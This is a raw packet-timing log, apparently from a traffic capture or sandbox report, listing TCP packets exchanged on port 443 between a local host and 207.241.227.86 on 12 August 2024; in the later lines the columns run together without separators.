Aug 12, 2024 11:37:05.717605114 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.717617035 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.717645884 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.779314995 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.779346943 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.779452085 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.779462099 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.779500961 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.805516958 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.805546045 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.805649996 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.805660009 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.805697918 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.806454897 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.806473970 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.806540966 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.806549072 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.806641102 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.807696104 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.807727098 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.807807922 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.807807922 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.807815075 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.807853937 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.809057951 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.809082985 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.809114933 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.809120893 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.809139967 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.809161901 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.820100069 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.820133924 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.820178032 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.820185900 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.820277929 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.820277929 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.870721102 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.870749950 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.870872021 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.870881081 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.870960951 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.897036076 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.897058010 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.897176027 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.897176027 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.897196054 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.897239923 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.897986889 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.898006916 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.898042917 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.898049116 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.898077011 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.898087025 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.899272919 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.899291992 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.899343967 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.899348974 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.899378061 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.899408102 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.900441885 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.900461912 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.900510073 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.900516033 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.900537968 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.900564909 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.901249886 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.901268959 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.901305914 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.901310921 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.901340961 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.901390076 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.902281046 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.902307987 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.902343988 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.902364016 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.902388096 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.902401924 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.950685024 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.950709105 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.950762033 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.950768948 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.950808048 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.950825930 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.961822987 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.961849928 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.961893082 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.961910963 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.961944103 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.961952925 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.986870050 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.987246037 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
                            Aug 12, 2024 11:37:05.987268925 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.987303972 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.987308979 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.987399101 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.987399101 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.988387108 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.988406897 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.988449097 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.988455057 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.988507032 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.988687992 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.988708019 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.988744974 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.988750935 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.988768101 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.988795996 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.990322113 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.990341902 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.990384102 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.990389109 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.990425110 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.990432024 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.991482019 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.991501093 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.991554022 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.991558075 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.991571903 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.991592884 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.991600037 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.991635084 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.991638899 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:05.991661072 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:05.991682053 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.040786028 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.040807962 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.040963888 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.040975094 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.041024923 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.051882029 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.051907063 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.051980019 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.051986933 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.052016973 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.052031994 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.077534914 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.077558994 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.077651978 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.077658892 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.077685118 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.077701092 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.078494072 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.078514099 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.078571081 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.078576088 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.078629017 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.079619884 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.079643011 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.079695940 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.079701900 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.079732895 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.079752922 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.080408096 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.080426931 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.080483913 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.080490112 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.080528975 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.081286907 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.081311941 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.081373930 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.081392050 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.081440926 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.081899881 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.081919909 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.082021952 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.082027912 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.082070112 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.131352901 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.131375074 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.131458998 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.131469011 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.131514072 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.142697096 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.142715931 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.142819881 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.142832994 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.142894030 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.168150902 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.168169975 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.168272018 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.168272018 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.168286085 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.168325901 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.169266939 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.169286013 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.169323921 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.169334888 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.169352055 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.169377089 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.169812918 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.169835091 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.169889927 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.169898987 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.169939041 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.171192884 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.171211958 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.171258926 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.171268940 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.171371937 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.171951056 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.171968937 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.172019005 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.172028065 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.172061920 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.173480988 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.173499107 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.173535109 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.173543930 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.173566103 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.173646927 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.222006083 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.222055912 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.222132921 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.222146034 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.222187042 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.222204924 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.233391047 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.233411074 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.233489990 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.233510017 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.233586073 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.259026051 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.259048939 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.259124994 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.259138107 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.259180069 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.260076046 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.260094881 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.260184050 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.260190010 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.260236979 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.260867119 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.260885000 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.260937929 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.260943890 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.260984898 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.261596918 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.261620045 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.261660099 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.261666059 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.261697054 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.261712074 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.262625933 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.262646914 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.262687922 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.262692928 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.262720108 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.262845993 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.263530016 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.263552904 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.263601065 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.263617039 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.263653040 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.312644958 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.312668085 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.312859058 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.312875986 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.312930107 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.324311972 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.324333906 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.324389935 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.324402094 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.324449062 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.349936008 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.349956989 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.350187063 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.350203991 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.350254059 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.350980997 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.350999117 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.351066113 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.351075888 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.351089001 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.351126909 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.351722956 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.351742029 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.351780891 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.351788998 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.351811886 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.351830006 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.352643013 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.352664948 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.352700949 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.352706909 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.352735043 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.352750063 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.353662968 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.353682041 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.353738070 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.353744030 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.353781939 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.354600906 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.354619026 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.354655981 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.354671001 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.354695082 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.354757071 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.403631926 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.403654099 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.403753042 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.403760910 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.403805017 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.415271044 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.415290117 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.415352106 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.415365934 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.415422916 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.440762043 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.440783024 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.440871000 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.440885067 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.440934896 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.441740036 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.441759109 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.441812992 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.441819906 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.441863060 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.442483902 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.442508936 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.442548037 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.442553997 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.442581892 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.442599058 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.444111109 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.444129944 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.444221973 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.444232941 CEST44349704207.241.227.86192.168.2.5
                            Aug 12, 2024 11:37:06.444282055 CEST49704443192.168.2.5207.241.227.86
                            Aug 12, 2024 11:37:06.444549084 CEST44349704207.241.227.86192.168.2.5
